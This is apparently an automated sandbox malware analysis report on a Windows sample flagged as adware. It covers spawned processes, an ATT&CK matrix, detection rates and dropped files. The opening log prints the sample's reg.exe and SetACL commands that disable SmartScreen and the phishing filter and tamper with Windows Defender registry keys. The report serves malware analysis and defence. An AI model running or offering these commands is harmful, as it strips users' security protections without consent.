Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_012BFC50 NetShareGetInfo,NetApiBufferFree,SetNamedSecurityInfoW,NetShareSetInfo,CloseHandle,RegCloseKey,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,SetSecurityDescriptorSacl,GetLastError,MakeSelfRelativeSD,MakeSelfRelativeSD,MakeSelfRelativeSD,GetLastError,GetAclInformation,GetLastError,GetAce,IsValidSid,IsValidSid,IsValidSid,GetLengthSid,CopySid,IsValidSid,std::locale::_Init,GetLastError,DeleteAce,GetLastError,3_2_012BFC50
Source: PowerRun.exe.0.drBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: PowerRun64.exe.0.drBinary or memory string: ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,3_2_012D9760
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: GetLocaleInfoW,3_2_012DA806
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_012DA0C1
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: EnumSystemLocalesW,3_2_012D9A02
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: EnumSystemLocalesW,3_2_012D9A4D
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_012D9EEC
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: EnumSystemLocalesW,3_2_012D9AE8
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: EnumSystemLocalesW,3_2_012DA2C3
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_012A98F0 EnterCriticalSection,GetSystemTimeAsFileTime,GetCurrentThreadId,GetUserNameExW,GetLastError,GetUserNameExW,GetLastError,LeaveCriticalSection,LeaveCriticalSection,3_2_012A98F0
Source: C:\Users\user\Desktop\P196hUN2fw.exeCode function: 0_2_004031F1 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004031F1
Source: C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exeCode function: 3_2_012C8D30 LookupAccountNameW,GetLastError,GetLastError,GetLastError,LookupAccountNameW,GetLastError,IsValidSid,IsValidSid,GetLengthSid,CopySid,Concurrency::cancel_current_task,3_2_012C8D30

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts12
Command and Scripting Interpreter		Path Interception1
Access Token Manipulation		1
Modify Registry		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		Exfiltration Over Other Network Medium1
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
System Shutdown/Reboot
Default Accounts1
Scripting		Boot or Logon Initialization Scripts12
Process Injection		1
Virtualization/Sandbox Evasion		LSASS Memory111
Security Software Discovery		Remote Desktop Protocol1
Clipboard Data		Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts1
Native API		Logon Script (Windows)Logon Script (Windows)1
Access Token Manipulation		Security Account Manager1
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)12
Process Injection		NTDS1
Process Discovery		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Scripting		LSA Secrets1
Account Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common1
Obfuscated Files or Information		Cached Domain Credentials1
System Owner/User Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync2
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem24
System Information Discovery		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 889003 Sample: P196hUN2fw.exe Startdate: 16/06/2023 Architecture: WINDOWS Score: 60 33 Multi AV Scanner detection for dropped file 2->33 35 Multi AV Scanner detection for submitted file 2->35 8 P196hUN2fw.exe 29 2->8         started        process3 file4 25 C:\Users\user\AppData\Local\...\usibkylp.exe, PE32 8->25 dropped 27 C:\Users\user\AppData\...\tpdhmfnkjvlicv.exe, PE32 8->27 dropped 29 C:\Users\user\AppData\Local\...\SetACL64.exe, PE32+ 8->29 dropped 31 4 other files (3 malicious) 8->31 dropped 37 Submitted sample is a known malware sample 8->37 39 Uses cmd line tools excessively to alter registry or file data 8->39 12 cmd.exe 1 8->12         started        signatures5 process6 signatures7 41 Uses cmd line tools excessively to alter registry or file data 12->41 15 reg.exe 1 12->15         started        17 conhost.exe 12->17         started        19 SetACL32.exe 1 12->19         started        21 36 other processes 12->21 process8 process9 23 Conhost.exe 15->23         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
P196hUN2fw.exe54%ReversingLabsWin32.Adware.Nemesis
P196hUN2fw.exe46%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\nst356E.tmp\PowerRun.exe32%ReversingLabsWin32.PUA.Generic
C:\Users\user\AppData\Local\Temp\nst356E.tmp\PowerRun.exe30%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\nst356E.tmp\PowerRun64.exe2%ReversingLabs
C:\Users\user\AppData\Local\Temp\nst356E.tmp\PowerRun64.exe4%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL64.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nst356E.tmp\nsExec.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nst356E.tmp\tpdhmfnkjvlicv.exe3%ReversingLabs
C:\Users\user\AppData\Local\Temp\nst356E.tmp\usibkylp.exe0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://helgeklein.com.0%Avira URL Cloudsafe
https://helgeklein.com.0%VirustotalBrowse

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://nsis.sf.net/NSIS_ErrorP196hUN2fw.exefalse
    		high
    http://nsis.sf.net/NSIS_ErrorErrorP196hUN2fw.exefalse
      		high
      https://helgeklein.com.SetACL32.exe, 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.398309778.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.399019913.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.400165246.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.400414047.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.401125929.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.401995733.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.401457083.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.402317383.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.402912531.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.403233090.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.404159972.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.405417159.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.404807673.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.405628679.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.406213773.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://helgeklein.comSetACL32.exe, 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.398309778.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.399019913.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.400165246.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.400414047.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.401125929.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.401995733.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.401457083.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.402317383.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.402912531.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.403233090.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.404159972.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.405417159.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.404807673.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.405628679.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.406213773.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drfalse
        		high
        https://helgeklein.com/setacl/documentation/command-line-version-setacl-exeSetACL32.exe, 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000003.00000000.398309778.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000000.399019913.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000004.00000002.400165246.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000000.400414047.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000005.00000002.401125929.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000002.401995733.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000006.00000000.401457083.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000000.402317383.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000007.00000002.402912531.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000000.403233090.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000008.00000002.404159972.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000002.405417159.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 00000009.00000000.404807673.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000000.405628679.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe, 0000000A.00000002.406213773.00000000012EE000.00000002.00000001.01000000.00000005.sdmp, SetACL32.exe.0.dr, SetACL64.exe.0.drfalse
          		high

          World Map of Contacted IPs

          No contacted IP infos

          General Information

          Joe Sandbox Version:37.1.0 Beryl
          Analysis ID:889003
          Start date and time:2023-06-16 13:45:49 +02:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 9m 44s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:44
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample file name:P196hUN2fw.exe
          Original Sample Name:e5daf6477340857b1d2d04411d7c0377.exe
          Detection:MAL
          Classification:mal60.winEXE@147/12@0/0
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 30.4% (good quality ratio 29.4%)
          • Quality average: 79.5%
          • Quality standard deviation: 24.9%
          HCA Information:
          • Successful, ratio: 75%
          • Number of executed functions: 52
          • Number of non-executed functions: 81
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Stop behavior analysis, all processes terminated

          Warnings

          • Exclude process from analysis (whitelisted): MpCmdRun.exe, conhost.exe
          • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.

          Simulations

          Behavior and APIs

          No simulations

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASNs

          No context

          JA3 Fingerprints

          No context

          Dropped Files

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          C:\Users\user\AppData\Local\Temp\nst356E.tmp\PowerRun.exeLruEqu1rpq.exeGet hashmaliciousUnknownBrowse

            Created / dropped Files

            C:\Users\user\AppData\Local\Temp\nst356E.tmp\2MB3.dat

            Download File
            Process:C:\Users\user\Desktop\P196hUN2fw.exe
            File Type:data
            Category:dropped
            Size (bytes):2000000
            Entropy (8bit):7.999903604199425
            Encrypted:true
            SSDEEP:49152:av8eLZZ7j2txwv6zQ7PtrnUQZchqfwkt6MEV739Gb:av8eLZtem6zaPtrnUQ+Ls6pVTEb
            MD5:2833CA525158A695837DA8F59AEBB14C
            SHA1:D7B050CFFCCA2F359DE0AF2C9133488EDE88D83A
            SHA-256:8316D8DDB49F4A8A3C62A1C8C98498A30176DD3AF2122CFB29785E17382C79BF
            SHA-512:0316CF570F9428141F8F572534C045B2B2F25DC17173F6230DE6421D4AB96228B124BAC5DE2E8C44B5E170825D98228F9C7EA3947096D03907F2B1F207AD3EC8
            Malicious:false
            Preview:k.._7QU..........Q.s.D9.U..*.q.......O.<......[r..5?.m......A.t-s.6..8..A.`.......0x.w.....J...H....Z0l.F..0<.0.3-..2...y...;.B"..-.I..t..#.O.Y7.T.....dX..>....um..B.d+.=R.<..q...N..h....Y.m..,.R..#.j..h.X...t.,..c..W?q.-.%..t.c.G..........I.G^......k......Ho....j.r..].'G..+.l../EZz+`..c.o.R.9...4...8....b.....9y......T.?.k..y=..'.;}....D.Hs..q~..+....p.h('d6y^/.6..........)..5M..:.x\'..N.b.b1....q.:.....rM..RM.....p.t.n...Q....gJ.....yE...c&.Jd<.....R...:.e?.D....h.fj.....m0....d...l..q.o5..(i$J5.*5...1..K.g.u..9...Q.+.paD.`........*-.Y9e......GO...I.9qN.....B9...Y.7b0......8.V...L..6&-..|.....i...4Ye..y)k.F...D.O>../.>.C7..A.Y^.[z..f?...}....".3+..4I&..5.t..r+.....C...&._./~.=...>.7..tV~V...s..{........7.....x..........~%....d._y. ..4..=u.AjWh...s.&\R/...AD...n.s....c]..O.4....0`8....J.Y..w..DOJ.Z..B.3.g...k[}....iUz.z.Qb^E..Wc.}.k.....}E......."Z.`*.."...EhYP.e.0 |QF..\....OTJi{..0i.P.._2...(.~....9...s...D....`...o4.f....3.j..kP.../...a

            C:\Users\user\AppData\Local\Temp\nst356E.tmp\PowerRun.exe

            Download File
            Process:C:\Users\user\Desktop\P196hUN2fw.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):794400
            Entropy (8bit):6.812760876754632
            Encrypted:false
            SSDEEP:12288:XaWzgMg7v3qnCi9ErQohh0F4fCJ8lnyQQdbpSulVAbWjuixwhQaB/Q:qaHMv6CRrj3nyQQdpSulmWjxwhQaG
            MD5:71C7975385F73AE32B06F69DBE79290B
            SHA1:05A1197CB8BD88447199E42A75BFCF99E32F2C48
            SHA-256:C0ABBEEA8AE726503BC5643F3471E378D92FCB59A37043062BBF9BA64D95004C
            SHA-512:1A6549788E97E5D07560F58DC11088424F0F90815F0CED2173BE169AD4DBF0E55CD19B40FBF8F65D65E0F6CADB21C0489DC6A8DE999859D12244879F4722EC95
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 32%
            • Antivirus: Virustotal, Detection: 30%, Browse
            Joe Sandbox View:
            • Filename: LruEqu1rpq.exe, Detection: malicious, Browse
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i.i.i..9.k.`.:.w.`.,...`.+.P.N%.c.N%.H.i.d.`. ./.w.:.k.w.;.h.i.8.h.`.>.h.Richi.........................PE..L......K..........#..........4.......c....... ....@.................................2d........@.......@.....................<...T....................... ............................................................ ..@............................text............................... ..`.rdata..\.... ......................@..@.data............h..................@....rsrc................H..............@..@................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Temp\nst356E.tmp\PowerRun64.exe

            Download File
            Process:C:\Users\user\Desktop\P196hUN2fw.exe
            File Type:PE32+ executable (GUI) x86-64, for MS Windows
            Category:dropped
            Size (bytes):945944
            Entropy (8bit):6.654096172451499
            Encrypted:false
            SSDEEP:24576:X2DW/xbMX2YIbxQsu3/PNLoQ+HyS2I4jRk:X2EgXoQsW/PNUQWnX4jRk
            MD5:EFE5769E37BA37CF4607CB9918639932
            SHA1:F24CA204AF2237A714E8B41D54043DA7BBE5393B
            SHA-256:5F9DFD9557CF3CA96A4C7F190FC598C10F8871B1313112C9AEA45DC8443017A2
            SHA-512:33794A567C3E16582DA3C2AC8253B3E61DF19C255985277C5A63A84A673AC64899E34E3B1EBB79E027F13D66A0B8800884CDD4D646C7A0ABE7967B6316639CF1
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 2%
            • Antivirus: Virustotal, Detection: 4%, Browse
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.@............yGI......p\.}....pJ......p[.............._.....................pP......ZJ......ZK.......H......pN.....Rich............................PE..d...(..K..........#......\...*......|..........@.....................................N........@...............@.................................T................j...Q.. ............................................................p...............................text....Z.......\.................. ..`.rdata...V...p...X...`..............@..@.data............v..................@....pdata...j.......l..................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL32.exe

            Download File
            Process:C:\Users\user\Desktop\P196hUN2fw.exe
            File Type:PE32 executable (console) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):526200
            Entropy (8bit):6.458888752002344
            Encrypted:false
            SSDEEP:12288:dISQ0bSlUcGj4wJUWKk2cgLOKvlZeX8KDNqb3kE1+mQwxVqnz1gqntMeyNC5fmVa:SLvlUcoXoxqnz17nryM5fmVlZq
            MD5:93B828ED97CB2C701364DF520DDD5331
            SHA1:CD8B4B8499D14A0E44DE3DC855AA5A8BA588E3D9
            SHA-256:9E2E0F10F6DDE0E19E441DEC7A6F14A813E5D39E9D7F70B2B48B88491F69BB9B
            SHA-512:86EF1CAF8102A119C239E62AF416AA07D85BDD0FA6815BEAB075A7B68DEC3F8DA293A309D915683010B6F7476F85EF38C9F5A8FF518B1F0A1EDB15884713B4B9
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 0%
            • Antivirus: Virustotal, Detection: 0%, Browse
            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......../6..NX..NX..NX..&[..NX..&]..NX..&^..NX.'<]..NX..;\..NX..;[..NX..;]..NX..&\..NX..&Y..NX..NY..OX..;Q..NX..;...NX..N..NX..;Z..NX.Rich.NX.........................PE..L......`.....................2...................@..........................0......[.....@..................................y..........x...............x.......lF......p...............................@............................................text...F........................... ..`.rdata..F...........................@..@.data....'...........t..............@....rsrc...x...........................@..@.reloc..lF.......H..................@..B........................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Temp\nst356E.tmp\SetACL64.exe

            Download File
            Process:C:\Users\user\Desktop\P196hUN2fw.exe
            File Type:PE32+ executable (console) x86-64, for MS Windows
            Category:dropped
            Size (bytes):616312
            Entropy (8bit):6.302197712270286
            Encrypted:false
            SSDEEP:12288:3G2NBTh+l8gAqAbdsuEa3nZGSebY7o937bfJ9Ud:3xNBTYlaLdaynZGBc7orbJ9Ud
            MD5:1FB64FF73938F4A04E97E5E7BF3D618C
            SHA1:AA0F7DB484D0C580533DEC0E9964A59588C3632B
            SHA-256:4EFC87B7E585FCBE4EAED656D3DBADAEC88BECA7F92CA7F0089583B428A6B221
            SHA-512:DA6007847FFE724BD0B0ABE000B0DD5596E2146F4C52C8FE541A2BF5F5F2F5893DCCD53EF315206F46A9285DDBD766010B226873038CCAC7981192D8C9937ECE
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 0%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................}.........@..........................................................g...........Rich....................PE..d.....`..........".................x$.........@..........................................`.............................................................x.... ..P@...J..x...............p.......................(.......8...............8............................text............................... ..`.rdata... ......."..................@..@.data....8..........................@....pdata..P@... ...B..................@..@_RDATA.......p.......$..............@..@.rsrc...x............&..............@..@.reloc...............<..............@..B................................................................................................................................................................................

            C:\Users\user\AppData\Local\Temp\nst356E.tmp\do32.bat

            Download File
            Process:C:\Users\user\Desktop\P196hUN2fw.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):12739
            Entropy (8bit):5.177383295779892
            Encrypted:false
